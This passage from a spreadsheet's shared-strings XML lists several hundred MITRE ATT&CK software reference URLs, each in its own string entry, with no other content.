  </si>
  <si>
    <t>https://attack.mitre.org/software/S0600</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0695</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0186</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0134</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0384</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0547</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0502</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0567</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0038</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0062</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0024</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0593</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0605</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0064</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0568</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0377</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0624</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0554</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0081</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0082</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0367</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0363</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0634</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0091</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0396</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0152</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0401</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0343</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0361</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0569</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0181</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0267</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0618</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0036</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0173</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0628</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0076</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0512</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0171</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0679</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0120</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0182</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0355</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0696</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0143</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0381</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0383</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0661</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0193</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0503</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0277</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1044</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0410</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0026</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0417</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0168</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0666</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0049</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0460</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0249</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0597</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0588</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0493</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0477</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0531</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0237</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0690</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0342</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0632</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0561</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0132</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0151</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0037</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0214</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0246</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0391</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0061</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0617</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0135</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0232</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0376</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0040</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0070</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0047</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0499</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0224</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0170</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0697</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0698</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1027</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0087</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0394</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0009</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0601</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0431</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0203</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0398</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0537</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0189</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1022</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0483</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0434</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0357</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0604</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0259</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0260</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0231</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0581</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0015</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0389</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0044</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0201</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0648</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0163</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0528</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0215</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0271</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0526</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0669</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0156</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0356</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0088</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0265</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0585</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0487</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1020</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0387</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0276</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0607</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0599</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0437</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0250</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0641</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0162</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0236</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0042</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0349</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0395</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0211</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0362</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0513</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0680</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0681</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0397</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0372</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0447</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0582</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0451</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0121</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0532</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0010</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0500</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0443</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0233</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1016</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0282</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0409</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0413</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0652</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0167</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0449</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0459</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0576</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0530</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0455</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0688</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0339</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1015</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0179</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0133</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0051</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0280</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0084</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0083</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0080</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0079</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0553</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1026</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0149</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0284</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1047</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0256</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0699</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0590</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0272</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0034</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0198</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0353</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0205</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0228</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0336</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0637</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0247</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0630</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0691</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0210</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0039</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0056</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0033</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0457</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0508</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0118</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0359</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0368</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0138</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0165</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0402</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0352</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0644</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0346</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0340</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0439</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0365</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0052</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0264</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0229</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0594</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1017</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0072</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0598</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0016</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0626</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0158</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0254</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0435</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0216</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0150</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0145</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0223</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0371</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0184</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0613</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0196</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0197</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0664</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0208</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0122</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0556</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1050</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0683</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0587</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0643</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0517</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0048</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0097</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1031</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0501</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0124</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0013</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0428</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0012</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0518</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0453</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0378</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1046</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0177</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0139</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1012</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0685</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0441</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0194</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0393</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0113</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0654</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0279</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0238</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0029</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0078</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0147</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0192</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1032</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0583</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0269</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0650</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0262</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0686</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0055</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0241</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0662</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0495</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0416</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0496</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0258</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0684</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0112</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0240</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0148</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0481</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0565</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0629</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0458</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0364</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0169</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1040</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0172</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0153</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0075</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0511</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0019</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0332</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0375</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0166</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0592</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0125</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0174</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0379</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0433</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0448</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0400</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0270</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0090</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0358</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0253</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0446</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0085</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0461</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0195</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0185</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0450</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0028</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0063</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0217</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0692</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0533</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0218</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0649</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0159</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0157</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0035</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0390</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1037</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1042</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1049</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0559</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0562</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0578</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0519</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0464</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1018</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0074</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0370</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0053</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0345</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0382</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0639</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0596</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0140</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1019</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0546</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0444</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0445</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0589</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0610</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0623</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0468</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0633</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1035</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0226</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0273</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0627</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0615</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0516</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0543</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0374</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0646</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1030</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0058</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0188</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0380</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0142</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1034</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0491</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0603</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0018</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0242</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0060</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0663</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0096</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0098</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0586</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0164</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0560</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0146</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0131</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0436</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0199</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0263</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0011</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0467</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1011</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0057</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0595</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0665</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0668</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0671</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0183</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0678</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0682</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0266</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0094</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0178</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0647</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0116</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0333</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0275</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0136</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0452</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0221</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0130</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0022</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0386</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0442</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0257</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0476</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0636</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0207</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0180</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0109</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0155</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0219</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0366</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0670</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0612</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0579</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0515</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0514</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0645</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0689</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0206</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0059</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0466</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0191</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0176</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0430</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0141</t>
  </si>
